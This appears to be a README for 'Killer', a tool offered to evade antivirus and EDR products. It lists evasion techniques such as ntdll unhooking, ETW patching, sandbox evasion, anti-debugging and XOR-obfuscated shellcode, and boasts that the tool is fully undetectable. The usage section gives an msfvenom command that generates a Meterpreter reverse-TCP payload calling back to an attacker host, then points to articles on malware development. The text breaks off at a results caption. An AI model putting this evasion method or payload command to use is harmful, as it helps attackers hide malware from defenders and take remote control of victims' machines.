Killer: tool created to evade AVs and EDRs or security tools
KILLER TOOL (EDR Evasion)
It’s an AV/EDR Evasion tool created to bypass security tools for learning, until now the tool is FUD.
Features:
- Module Stomping for Memory scanning evasion
- DLL Unhooking by fresh ntdll copy
- IAT Hiding and Obfuscation & API Unhooking
- ETW Patching for bypassing some security controls
- Included sandbox evasion techniques & Basic Anti-Debugging
- Fully obfuscated (Functions – Keys – Shellcode) by XOR-ing
- Shellcode reversed and Encrypted
- Moving payload into hallowed memory without using APIs
- Runs without creating new thread & Suppoers x64 and x86 arch
How to use it
Generate your shellcode with msfvenom tool :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
Then copy the output into the encryptor XOR function:
And then you can handle your decryption function, It’s not easy for script kiddies ^-^, you can read more about it in my article:
- Part 1 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
- Part 2 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
This is the result when running: